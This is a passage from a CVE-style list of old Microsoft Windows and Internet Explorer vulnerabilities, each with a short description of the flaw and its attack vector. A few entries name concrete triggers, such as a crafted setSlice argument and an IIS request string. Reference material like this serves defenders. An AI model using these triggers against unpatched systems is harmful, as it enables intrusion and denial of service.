long URL on a website that uses HTTP 1.1 compression. [CVE-2006-3730] Integer overflow in Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a 0x7fffffff argument to the setSlice method on a WebViewFolderIcon ActiveX object, which leads to an invalid memory copy. [CVE-2006-3648] Unspecified vulnerability in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 and 2003 SP1, allows remote attackers to execute arbitrary code via unspecified vectors involving unhandled exceptions, memory resident applications, and incorrectly "unloading chained exception." [CVE-2006-3643] Cross-site scripting (XSS) vulnerability in Internet Explorer 5.01 and 6 in Microsoft Windows 2000 SP4 permits access to local "HTML-embedded resource files" in the Microsoft Management Console (MMC) library, which allows remote authenticated users to execute arbitrary commands, aka "MMC Redirect Cross-Site Scripting Vulnerability." [CVE-2006-3510] The Remote Data Service Object (RDS.DataControl) in Microsoft Internet Explorer 6 on Windows 2000 allows remote attackers to cause a denial of service (crash) via a series of operations that result in an invalid length calculation when using SysAllocStringLen, then triggers a buffer over-read. [CVE-2006-3471] Microsoft Internet Explorer 6 on Windows XP allows remote attackers to cause a denial of service (crash) via a table with a frameset as a child, which triggers a null dereference, as demonstrated using the appendChild method. [CVE-2006-3448] Buffer overflow in the Step-by-Step Interactive Training in Microsoft Windows 2000 SP4, XP SP2 and Professional, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a long Syllabus string in crafted bookmark link files (cbo, cbl, or .cbm), a different issue than CVE-2005-1212. [CVE-2006-3445] Integer overflow in the ReadWideString function in agentdpv.dll in Microsoft Agent on Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via a large length value in an .ACF file, which results in a heap-based buffer overflow. [CVE-2006-3444] Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, probably a buffer overflow, allows local users to obtain privileges via unspecified vectors involving an "unchecked buffer." [CVE-2006-3443] Untrusted search path vulnerability in Winlogon in Microsoft Windows 2000 SP4, when SafeDllSearchMode is disabled, allows local users to gain privileges via a malicious DLL in the UserProfile directory, aka "User Profile Elevation of Privilege Vulnerability." [CVE-2006-3442] Unspecified vulnerability in Pragmatic General Multicast (PGM) in Microsoft Windows XP SP2 and earlier allows remote attackers to execute arbitrary code via a crafted multicast message. [CVE-2006-3441] Buffer overflow in the DNS Client service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted record response. NOTE: while MS06-041 implies that there is a single issue, there are multiple vectors, and likely multiple vulnerabilities, related to (1) a heap-based buffer overflow in a DNS server response to the client, (2) a DNS server response with malformed ATMA records, and (3) a length miscalculation in TXT, HINFO, X25, and ISDN records. [CVE-2006-3440] Buffer overflow in the Winsock API in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka "Winsock Hostname Vulnerability." [CVE-2006-3439] Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314. [CVE-2006-3209] DISPUTED The Task scheduler (at.exe) on Microsoft Windows XP spawns each scheduled process with SYSTEM permissions, which allows local users to gain privileges. NOTE: this issue has been disputed by third parties, who state that the Task scheduler is limited to the Administrators group by default upon installation. [CVE-2006-2766] Buffer overflow in INETCOMM.DLL, as used in Microsoft Internet Explorer 6.0 through 6.0 SP2, Windows Explorer, Outlook Express 6, and possibly other programs, allows remote user-assisted attackers to cause a denial of service (application crash) via a long mhtml URI in the URL value in a URL file. [CVE-2006-2386] Unspecified vulnerability in Microsoft Outlook Express 6 and earlier allows remote attackers to execute arbitrary code via a crafted contact record in a Windows Address Book (WAB) file. [CVE-2006-2380] Microsoft Windows 2000 SP4 does not properly validate an RPC server during mutual authentication over SSL, which allows remote attackers to spoof an RPC server, aka the "RPC Mutual Authentication Vulnerability." [CVE-2006-2379] Buffer overflow in the TCP/IP Protocol driver in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote attackers to execute arbitrary code via unknown vectors related to IP source routing. [CVE-2006-2378] Buffer overflow in the ART Image Rendering component (jgdw400.dll) in Microsoft Windows XP SP1 and Sp2, Server 2003 SP1 and earlier, and Windows 98 and Me allows remote attackers to execute arbitrary code via a crafted ART image that causes heap corruption. [CVE-2006-2376] Integer overflow in the PolyPolygon function in Graphics Rendering Engine on Microsoft Windows 98 and Me allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) or EMF image with a sum of entries in the vertext counts array and number of polygons that triggers a heap-based buffer overflow. [CVE-2006-2374] The Server Message Block (SMB) driver (MRXSMB.SYS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows local users to cause a denial of service (hang) by calling the MrxSmbCscIoctlCloseForCopyChunk with the file handle of the shadow device, which results in a deadlock, aka the "SMB Invalid Handle Vulnerability." [CVE-2006-2373] The Server Message Block (SMB) driver (MRXSMB.SYS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows local users to execute arbitrary code by calling the MrxSmbCscIoctlOpenForCopyChunk function with the METHOD_NEITHER method flag and an arbitrary address, possibly for kernel memory, aka the "SMB Driver Elevation of Privilege Vulnerability." [CVE-2006-2372] Buffer overflow in the DHCP Client service for Microsoft Windows 2000 SP4, Windows XP SP1 and SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via a crafted DHCP response. [CVE-2006-2371] Buffer overflow in the Remote Access Connection Manager service (RASMAN) service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to execute arbitrary code via certain crafted "RPC related requests," that lead to registry corruption and stack corruption, aka the "RASMAN Registry Corruption Vulnerability." [CVE-2006-2370] Buffer overflow in the Routing and Remote Access service (RRAS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to execute arbitrary code via certain crafted "RPC related requests," aka the "RRAS Memory Corruption Vulnerability." [CVE-2006-2334] The RtlDosPathNameToNtPathName_U API function in NTDLL.DLL in Microsoft Windows 2000 SP4 and XP SP2 does not properly convert DOS style paths with trailing spaces into NT style paths, which allows context-dependent attackers to create files that cannot be accessed through the expected DOS path or prevent access to other similarly named files in the same directory, which prevents those files from being detected or disinfected by certain anti-virus and anti-spyware software. [CVE-2006-2218] Unspecified vulnerability in Internet Explorer 6.0 on Microsoft Windows XP SP2 allows remote attackers to execute arbitrary code via "exceptional conditions" that trigger memory corruption, as demonstrated using an exception handler and nested object tags, a variant of CVE-2006-1992. [CVE-2006-2094] Microsoft Internet Explorer before Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1, when Prompt is configured in Security Settings, uses modal dialogs to verify that a user wishes to run an ActiveX control or perform other risky actions, which allows user-assisted remote attackers to construct a race condition that tricks a user into clicking an object or pressing keys that are actually applied to a "Yes" approval for executing the control. [CVE-2006-2056] Argument injection vulnerability in Internet Explorer 6 for Windows XP SP2 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. [CVE-2006-1654] Directory traversal vulnerability in the HP Color LaserJet 2500 Toolbox and Color LaserJet 4600 Toolbox on Microsoft Windows before 20060402 allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP GET request to TCP port 5225. [CVE-2006-1651] DISPUTED Microsoft ISA Server 2004 allows remote attackers to bypass certain filtering rules, including ones for (1) ICMP and (2) TCP, via IPv6 packets. NOTE: An established researcher has disputed this issue, saying that "Neither ISA Server 2004 nor Windows 2003 Basic Firewall support IPv6 filtering ... This is different network protocol." [CVE-2006-1591] Heap-based buffer overflow in Microsoft Windows Help winhlp32.exe allows user-assisted attackers to execute arbitrary code via crafted embedded image data in a .hlp file. [CVE-2006-1510] Buffer overflow in calloc.c in the Microsoft Windows XP SP2 ntdll.dll system library, when used by the ILDASM disassembler in the Microsoft .NET 1.0 and 1.1 SDK, might allow user-assisted attackers to execute arbitrary code via a crafted .dll file with a large static method. [CVE-2006-1476] Windows Firewall in Microsoft Windows XP SP2 produces incorrect application block alerts when the application filename is ".exe" (with no characters before the "."), which might allow local user-assisted users to trick a user into unblocking a Trojan horse program, as demonstrated by a malicious ".exe" program in a folder named "Internet Explorer," which triggers a question about whether to unblock the "Internet Explorer" program. [CVE-2006-1475] Windows Firewall in Microsoft Windows XP SP2 does not produce application alerts when an application is executed using the NTFS Alternate Data Streams (ADS) filename:stream syntax, which might allow local users to launch a Trojan horse attack in which the victim does not obtain the alert that Windows Firewall would have produced for a non-ADS file. [CVE-2006-1315] The Server Service (SRV.SYS driver) in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 up to SP1, and other products, allows remote attackers to obtain sensitive information via crafted requests that leak information in SMB buffers, which are not properly initialized, aka "SMB Information Disclosure Vulnerability." [CVE-2006-1314] Heap-based buffer overflow in the Server Service (SRV.SYS driver) in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 up to SP1, and other products, allows remote attackers to execute arbitrary code via crafted first-class Mailslot messages that triggers memory corruption and bypasses size restrictions on second-class Mailslot messages. [CVE-2006-1313] Microsoft JScript 5.1, 5.5, and 5.6 on Windows 2000 SP4, and 5.6 on Windows XP, Server 2003, Windows 98 and Windows Me, will "release objects early" in certain cases, which results in memory corruption and allows remote attackers to execute arbitrary code. [CVE-2006-1311] The RichEdit component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 [CVE-2006-1300] Microsoft .NET framework 2.0 (ASP.NET) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 up to SP1 allows remote attackers to bypass access restrictions via unspecified "URL paths" that can access Application Folder objects "explicitly by name." [CVE-2006-1184] Microsoft Distributed Transaction Coordinator (MSDTC) for Windows NT 4.0, 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote attackers to cause a denial of service (crash) via a BuildContextW request with a large (1) UuidString or (2) GuidIn of a certain length, which causes an out-of-range memory access, aka the MSDTC Denial of Service Vulnerability. NOTE: this is a variant of CVE-2005-2119. [CVE-2006-0988] The default configuration of the DNS Server service on Windows Server 2003 and Windows 2000, and the Microsoft DNS Server service on Windows NT 4.0, allows recursive queries and provides additional delegation information to arbitrary IP addresses, which allows remote attackers to cause a denial of service (traffic amplification) via DNS queries with spoofed source IP addresses. [CVE-2006-0753] Memory leak in Microsoft Internet Explorer 6 for Windows XP Service Pack 2 allows remote attackers to cause a denial of service (memory consumption) via JavaScript that uses setInterval to repeatedly call a function to set the value of window.status. [CVE-2006-0561] Cisco Secure Access Control Server (ACS) 3.x for Windows stores ACS administrator passwords and the master key in the registry with insecure permissions, which allows local users and remote administrators to decrypt the passwords by using Microsoft's cryptographic API functions to obtain the plaintext version of the master key. [CVE-2006-0143] Microsoft Windows Graphics Rendering Engine (GRE) allows remote attackers to corrupt memory and cause a denial of service (crash) via a WMF file containing (1) ExtCreateRegion or (2) ExtEscape function calls with arguments with inconsistent lengths. [CVE-2006-0034] Heap-based buffer overflow in the CRpcIoManagerServer::BuildContext function in msdtcprx.dll for Microsoft Distributed Transaction Coordinator (MSDTC) for Windows NT 4.0 and Windows 2000 SP2 and SP3 allows remote attackers to execute arbitrary code via a long fifth argument to the BuildContextW or BuildContext opcode, which triggers a bug in the NdrAllocate function, aka the MSDTC Invalid Memory Access Vulnerability. [CVE-2006-0032] Cross-site scripting (XSS) vulnerability in the Indexing Service in Microsoft Windows 2000, XP, and Server 2003, when the Encoding option is set to Auto Select, allows remote attackers to inject arbitrary web script or HTML via a UTF-7 encoded URL, which is injected into an error message whose charset is set to UTF-7. [CVE-2006-0025] Stack-based buffer overflow in Microsoft Windows Media Player 9 and 10 allows remote attackers to execute arbitrary code via a PNG image with a large chunk size. [CVE-2006-0023] Microsoft Windows XP SP1 and SP2 before August 2004, and possibly other operating systems and versions, uses insecure default ACLs that allow the Authenticated Users group to gain privileges by modifying critical configuration information for the (1) Simple Service Discovery Protocol (SSDP), (2) Universal Plug and Play Device Host (UPnP), (3) NetBT, (4) SCardSvr, (5) DHCP, and (6) DnsCache services, aka "Permissive Windows Services DACLs." NOTE: the NetBT, SCardSvr, DHCP, DnsCache already require privileged access to exploit. [CVE-2006-0021] Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote attackers to cause a denial of service (hang) via an IGMP packet with an invalid IP option, aka the "IGMP v3 DoS Vulnerability." [CVE-2006-0020] An unspecified Microsoft WMF parsing application, as used in Internet Explorer 5.01 SP4 on Windows 2000 SP4, and 5.5 SP2 on Windows Millennium, and possibly other versions, allows attackers to cause a denial of service (crash) and possibly execute code via a crafted WMF file with a manipulated WMF header size, possibly involving an integer overflow, a different vulnerability than CVE-2005-4560, and aka "WMF Image Parsing Memory Corruption Vulnerability." [CVE-2006-0014] Buffer overflow in Microsoft Outlook Express 5.5 and 6 allows remote attackers to execute arbitrary code via a crafted Windows Address Book (WAB) file containing "certain Unicode strings" and modified length values. [CVE-2006-0013] Buffer overflow in the Web Client service (WebClnt.dll) for Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote authenticated users or Guests to execute arbitrary code via crafted RPC requests, a different vulnerability than CVE-2005-1207. [CVE-2006-0012] Unspecified vulnerability in Windows Explorer in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via attack vectors involving COM objects and "crafted files and directories," aka the "Windows Shell Vulnerability." [CVE-2006-0010] Heap-based buffer overflow in T2EMBED.DLL in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 up to SP1, Windows 98, and Windows ME allows remote attackers to execute arbitrary code via an e-mail message or web page with a crafted Embedded Open Type (EOT) web font that triggers the overflow during decompression. [CVE-2006-0008] The ShellAbout API call in Korean Input Method Editor (IME) in Korean versions of Microsoft Windows XP SP1 and SP2, Windows Server 2003 up to SP1, and Office 2003, allows local users to gain privileges by launching the "shell about dialog box" and clicking the "End-User License Agreement" link, which executes Notepad with the privileges of the program that displays the about box. [CVE-2006-0006] Heap-based buffer overflow in the bitmap processing routine in Microsoft Windows Media Player 7.1 on Windows 2000 SP4, Media Player 9 on Windows 2000 SP4 and XP SP1, and Media Player 10 on XP SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted bitmap (.BMP) file that specifies a size of 0 but contains additional data. [CVE-2006-0005] Buffer overflow in the plug-in for Microsoft Windows Media Player (WMP) 9 and 10, when used in browsers other than Internet Explorer and set as the default application to handle media files, allows remote attackers to execute arbitrary code via HTML with an EMBED element containing a long src attribute. [CVE-2005-4717] Microsoft Internet Explorer 6.0 on Windows NT 4.0 SP6a, Windows 2000 SP4, Windows XP SP1, Windows XP SP2, and Windows Server 2003 SP1 allows remote attackers to cause a denial of service (client crash) via a certain combination of a malformed HTML file and a CSS file that triggers a null dereference, probably related to rendering of a DIV element that contains a malformed IMG tag, as demonstrated by IEcrash.htm and IEcrash.rar. [CVE-2005-4560] The Windows Graphical Device Interface library (GDI32.DLL) in Microsoft Windows allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) format image with a crafted SETABORTPROC GDI Escape function call, related to the Windows Picture and Fax Viewer (SHIMGVW.DLL), a different vulnerability than CVE-2005-2123 and CVE-2005-2124, and as originally discovered in the wild on unionseek.com. [CVE-2005-4360] The URL parser in Microsoft Internet Information Services (IIS) 5.1 on Windows XP Professional SP2 allows remote attackers to execute arbitrary code via multiple requests to ".dll" followed by arguments such as "~0" through "~9", which causes ntdll.dll to produce a return value that is not correctly handled by IIS, as demonstrated using "/_vti_bin/.dll//~0". NOTE: the consequence was originally believed to be only a denial of service (application crash and reboot). [CVE-2005-4269] mshtml.dll in Microsoft Windows XP, Server 2003, and Internet Explorer 6.0 SP1 allows attackers to cause a denial of service (access violation) by causing mshtml.dll to process button-focus events at the same time that a document is reloading, as seen in Microsoft Office InfoPath 2003 by repeatedly clicking the "Delete" button in a repeating section in a form. NOTE: the normal operation of InfoPath appears to involve a local user without any privilege boundaries, so this might not be a vulnerability in InfoPath. If no realistic scenarios exist for this problem in other products, then perhaps it should be excluded from CVE. [CVE-2005-3981] * DISPUTED NOTE: this issue has been disputed by third parties. Microsoft Windows XP, 2000, and 2003 allows local users to kill a writable process by using the CreateRemoteThread function with certain arguments on a process that has been opened using the OpenProcess function, possibly involving an invalid address for the start routine. NOTE: followup posts have disputed this issue, saying that if a user already has privileges to write to a process, then other functions could be called or the process could be terminated using PROCESS_TERMINATE. [CVE-2005-3945] The SynAttackProtect protection in Microsoft Windows 2003 before SP1 and Windows 2000 before SP4 with Update Roll-up uses a hash of predictable data, which allows remote attackers to cause a denial of service (CPU consumption) via a flood of SYN packets that produce identical hash values, which slows down the hash table lookups. [CVE-2005-3644] PNP_GetDeviceList (upnp_getdevicelist) in UPnP for Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via a DCE RPC request that specifies a large output buffer size, a variant of CVE-2006-6296, and a different vulnerability than CVE-2005-2120. [CVE-2005-3595] By default Microsoft Windows XP Home Edition installs with a blank password for the Administrator account, which allows remote attackers to gain control of the computer. [CVE-2005-3177] CHKDSK in Microsoft Windows 2000 before Update Rollup 1 for SP4, Windows XP, and Windows Server 2003, when running in fix mode, does not properly handle security descriptors if the master file table contains a large number of files or if the descriptors do not satisfy certain NTFS conventions, which could cause ACLs for some files to be reverted to less secure defaults, or cause security descriptors to be removed. [CVE-2005-3176] Microsoft Windows 2000 before Update Rollup 1 for SP4 does not record the IP address of a Windows Terminal Services client in a security log event if the client connects successfully, which could make it easier for attackers to escape detection. [CVE-2005-3175] Microsoft Windows 2000 before Update Rollup 1 for SP4 allows a local administrator to unlock a computer even if it has been locked by a domain administrator, which allows the local administrator to access the session as the domain administrator. [CVE-2005-3174] Microsoft Windows 2000 before Update Rollup 1 for SP4 allows users to log on to the domain, even when their password has expired, if the fully qualified domain name (FQDN) is 8 characters long. [CVE-2005-3173] Microsoft Windows 2000 before Update Rollup 1 for SP4 does not apply group policies if the user logs on using UPN credentials with a trailing dot, which prevents Windows 2000 from finding the correct domain controller and could allow the user to bypass intended restrictions. [CVE-2005-3172] The WideCharToMultiByte function in Microsoft Windows 2000 before Update Rollup 1 for SP4 does not properly convert strings with Japanese composite characters in the last character, which could prevent the string from being null terminated and lead to data corruption or enable buffer overflow attacks. [CVE-2005-3171] Microsoft Windows 2000 before Update Rollup 1 for SP4 records Event ID 1704 to indicate that Group Policy security settings were successfully updated, even when the processing fails such as when Ntuser.pol cannot be accessed, which could cause system administrators to believe that the system is compliant with the specified settings. [CVE-2005-3170] The LDAP client on Microsoft Windows 2000 before Update Rollup 1 for SP4 accepts certificates using LDAP Secure Sockets Layer (LDAPS) even when the Certificate Authority (CA) is not trusted, which could allow attackers to trick users into believing that they are accessing a trusted site. [CVE-2005-3169] Microsoft Windows 2000 before Update Rollup 1 for SP4, when the "audit directory service access" policy is enabled, does not record a 565 event message for File Delete Child operations on an Active Directory object in the security event log, which could allow attackers to conduct unauthorized activities without detection. [CVE-2005-3168] The SECEDIT command on Microsoft Windows 2000 before Update Rollup 1 for SP4, when using a security template to set Access Control Lists (ACLs) on folders, does not apply ACLs on folders that are listed after a long folder entry, which could result in less secure permissions than specified by the template. [CVE-2005-2940] Unquoted Windows search path vulnerability in Microsoft Antispyware 1.0.509 (Beta 1) might allow local users to gain privileges via a malicious "program.exe" file in the C: folder, involving the programs (1) GIANTAntiSpywareMain.exe, (2) gcASNotice.exe, (3) gcasServ.exe, (4) gcasSWUpdater.exe, or (5) GIANTAntiSpywareUpdater.exe. NOTE: it is not clear whether this overlaps CVE-2005-2935. [CVE-2005-2935] Unquoted Windows search path vulnerability in Microsoft AntiSpyware might allow local users to execute code via a malicious c:\program.exe file, which is run by AntiSpywareMain.exe when it attempts to execute gsasDtServ.exe. NOTE: it is not clear whether this overlaps CVE-2005-2940. [CVE-2005-2388] Buffer overflow in a certain USB driver, as used on Microsoft Windows, allows attackers to execute arbitrary code. [CVE-2005-2307] netman.dll in Microsoft Windows Connections Manager Library allows local users to cause a denial of service (Network Connections Service crash) via a large integer argument to a particular function, aka "Network Connection Manager Vulnerability." [CVE-2005-2128] QUARTZ.DLL in Microsoft Windows Media Player 9 allows remote attackers to write a null byte to arbitrary memory via an AVI file with a crafted strn element with a modified length value. [CVE-2005-2122] Windows Shell for Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote attackers to execute arbitrary commands via a shortcut (.lnk) file with long font properties that lead to a buffer overflow in the Client/Server Runtime Server Subsystem (CSRSS), a different vulnerability than CVE-2005-2118. [CVE-2005-2120] Stack-based buffer overflow in the Plug and Play (PnP) service (UMPNPMGR.DLL) in Microsoft Windows 2000 SP4, and XP SP1 and SP2, allows remote or local authenticated attackers to execute arbitrary code via a large number of "\" (backslash) characters in a registry key name, which triggers the overflow in a wsprintfW function call. [CVE-2005-2118] Windows Shell for Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote user-assisted attackers to execute arbitrary commands via a crafted shortcut (.lnk) file with long font properties that lead to a buffer overflow when the user views the file's properties using Windows Explorer, a different vulnerability than CVE-2005-2122. [CVE-2005-2117] Web View in Windows Explorer on Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 does not properly handle certain HTML characters in preview fields, which allows remote user-assisted attackers to execute arbitrary code. [CVE-2005-1987] Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the "Content-Type" string. [CVE-2005-1985] The Client Service for NetWare (CSNW) on Microsoft Windows 2000 SP4, XP SP1 and Sp2, and Server 2003 SP1 and earlier, allows remote attackers to execute arbitrary code due to an "unchecked buffer" when processing certain crafted network messages. [CVE-2005-1984] Buffer overflow in the Print Spooler service (Spoolsv.exe) for Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via a malicious message. [CVE-2005-1983] Stack-based buffer overflow in the Plug and Play (PnP) service for Microsoft Windows 2000 and Windows XP Service Pack 1 allows remote attackers to execute arbitrary code via a crafted packet, and local users to gain privileges via a malicious application, as exploited by the Zotob (aka Mytob) worm. [CVE-2005-1982] Unknown vulnerability in the PKINIT Protocol for Microsoft Windows 2000, Windows XP, and Windows Server 2003 could allow a local user to obtain information and spoof a server via a man-in-the-middle (MITM) attack between a client and a domain controller when PKINIT smart card authentication is being used. [CVE-2005-1981] Unknown vulnerability in Microsoft Windows 2000 Server and Windows Server 2003 domain controllers allows remote authenticated users to cause a denial of service (system crash) via a crafted Kerberos message. [CVE-2005-1980] Distributed Transaction Controller in Microsoft Windows allows remote servers to cause a denial of service (MSDTC service hang) via a crafted Transaction Internet Protocol (TIP) message that causes DTC to repeatedly connect to a target IP and port number after an error occurs, aka the "Distributed TIP Vulnerability." [CVE-2005-1979] Distributed Transaction Controller in Microsoft Windows allows remote servers to cause a denial of service (MSDTC service exception and exit) via an "unexpected protocol command during the reconnection request," which is not properly handled by the Transaction Internet Protocol (TIP) functionality. [CVE-2005-1978] COM+ in Microsoft Windows does not properly "create and use memory structures," which allows local users or remote attackers to execute arbitrary code. [CVE-2005-1793] User32.DLL in Microsoft Windows 98SE, and possibly other operating systems, allows local and remote attackers to cause a denial of service (crash) via an icon (.ico) bitmap file with large width and height values. [CVE-2005-1219] Buffer overflow in the Microsoft Color Management Module for Windows allows remote attackers to execute arbitrary code via an image with crafted ICC profile format tags. [CVE-2005-1218] The Microsoft Windows kernel in Microsoft Windows 2000 Server, Windows XP, and Windows Server 2003 allows remote attackers to cause a denial of service (crash) via crafted Remote Desktop Protocol (RDP) requests. [CVE-2005-1208] Integer overflow in Microsoft Windows 98, 2000, XP SP2 and earlier, and Server 2003 SP1 and earlier allows remote attackers to execute arbitrary code via a crafted compiled Help (.CHM) file with a large size field that triggers a heap-based buffer overflow, as demonstrated using a "ms-its:" URL in Internet Explorer. [CVE-2005-1207] Buffer overflow in the Web Client service in Microsoft Windows XP and Windows Server 2003 allows remote authenticated users to execute arbitrary code via a crafted WebDAV request containing special parameters. [CVE-2005-1206] Buffer overflow in the Server Message Block (SMB) functionality for Microsoft Windows 2000, XP SP1 and SP2, and Server 2003 and SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka the "Server Message Block Vulnerability." [CVE-2005-1205] The Telnet client for Microsoft Windows XP, Windows Server 2003, and Windows Services for UNIX allows remote attackers to read sensitive environment variables via the NEW-ENVIRON option with a SEND ENV_USERVAR command. [CVE-2005-0852] Microsoft Windows XP SP1 allows local users to cause a denial of service (system crash) via an empty datagram to a raw IP over IP socket (IP protocol 4), as originally demonstrated using code in Python 2.3. [CVE-2005-0551] Stack-based buffer overflow in WINSRV.DLL in the Client Server Runtime System (CSRSS) process of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via a specially-designed application that provides console window information with a long FaceName value. [CVE-2005-0550] Buffer overflow in Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to cause a denial of service (i.e., system crash) via a malformed request, aka "Object Management Vulnerability". [CVE-2005-0545] Microsoft Windows XP Pro SP2 and Windows 2000 Server SP4 running Active Directory allow local users to bypass group policies that restrict access to hidden drives by using the browse feature in Office 10 applications such as Word or Excel, or using a flash drive. NOTE: this issue has been disputed in a followup post. [CVE-2005-0063] The document processing application used by the Windows Shell in Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code by modifying the CLSID stored in a file so that it is processed by HTML Application Host (MSHTA), as demonstrated using a Microsoft Word document. [CVE-2005-0061] The kernel of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via certain access requests. [CVE-2005-0060] Buffer overflow in the font processing component of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via a specially-designed application. [CVE-2005-0059] Buffer overflow in the Message Queuing component of Microsoft Windows 2000 and Windows XP SP1 allows remote attackers to execute arbitrary code via a crafted message. [CVE-2005-0058] Buffer overflow in the Telephony Application Programming Interface (TAPI) for Microsoft Windows 98, Windows 98 SE, Windows ME, Windows 2000, Windows XP, and Windows Server 2003 allows attackers elevate privileges or execute arbitrary code via a crafted message. [CVE-2005-0048] Microsoft Windows XP SP2 and earlier, 2000 SP3 and SP4, Server 2003, and older operating systems allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted IP packets with malformed options, aka the "IP Validation Vulnerability." [CVE-2004-2527] The local and remote desktop login screens in Microsoft Windows XP before SP2 and 2003 allow remote attackers to cause a denial of service (CPU and memory consumption) by repeatedly using the WinKey+"U" key combination, which causes multiple copies of Windows Utility Manager to be loaded more quickly than they can be closed when the copies detect that another instance is running. [CVE-2004-2454] aMSN 0.90 for Microsoft Windows allows local users to obtain sensitive information such as hashed passwords from (1) hotlog.htm and (2) config.xml. [CVE-2004-2365] Memory leak in Microsoft Windows XP and Windows Server 2003 allows local users to cause a denial of service (memory exhaustion) by repeatedly creating and deleting directories using a non-standard tool such as smbmount. [CVE-2004-2339] DISPUTED Microsoft Windows 2000, XP, and possibly 2003 allows local users with the SeDebugPrivilege privilege to execute arbitrary code as kernel and read or write kernel memory via the NtSystemDebugControl function, which does not verify its pointer arguments. Note: this issue has been disputed, since Administrator privileges are typically required to exploit this issue, thus privilege boundaries are not crossed. [CVE-2004-2307] Microsoft Internet Explorer 6.0.2600 on Windows XP allows remote attackers to cause a denial of service (browser crash) via a shell: URI with double backslashes (\\) in an HTML tag such as IFRAME or A. [CVE-2004-2291] Microsoft Windows Internet Explorer 5.5 and 6.0 allows remote attackers to execute arbitrary code via an embedded script that uses Shell Helper objects and a shortcut (link) to execute the target script. [CVE-2004-2290] Microsoft Windows XP Explorer allows attackers to execute arbitrary code via a HTML and script in a self-executing folder that references an executable file within the folder, which is automatically executed when a user accesses the folder. [CVE-2004-2289] Microsoft Windows XP Explorer allows local users to execute arbitrary code via a system folder with a Desktop.ini file containing a .ShellClassInfo specifier with a CLSID value that is associated with an executable file. [CVE-2004-2176] The Internet Connection Firewall (ICF) in Microsoft Windows XP SP2 is configured by default to trust sessmgr.exe, which allows local users to use sessmgr.exe to create a local listening port that bypasses the ICF access controls. [CVE-2004-1889] Unknown vulnerability in ftpd in SGI IRIX 6.5.20 through 6.5.23 allows remote attackers to cause a denial of service (hang) via a link failure with Microsoft Windows. [CVE-2004-1325] The getItemInfoByAtom function in the ActiveX control for Microsoft Windows Media Player 9.0 returns a 0 if the file does not exist and the size of the file if the file exists, which allows remote attackers to determine the existence of files on the local system. [CVE-2004-1324] The Microsoft Windows Media Player 9.0 ActiveX control may allow remote attackers to execute arbitrary web script in the Local computer zone via the (1) artist or (2) song fields of a music file, if the file is processed using Internet Explorer. [CVE-2004-1080] The WINS service (wins.exe) on Microsoft Windows NT Server 4.0, Windows 2000 Server, and Windows Server 2003 allows remote attackers to write to arbitrary memory locations and possibly execute arbitrary code via a modified memory pointer in a WINS replication packet to TCP port 42, aka the "Association Context Vulnerability." [CVE-2004-1049] Integer overflow in the LoadImage API of the USER32 Lib for Microsoft Windows allows remote attackers to execute arbitrary code via a .bmp, .cur, .ico or .ani file with a large image size field, which leads to a buffer overflow, aka the "Cursor and Icon Format Handling Vulnerability." [CVE-2004-0901] Microsoft Word for Windows 6.0 Converter (MSWRD632.WPC), as used in WordPad, does not properly validate certain data lengths, which allows remote attackers to execute 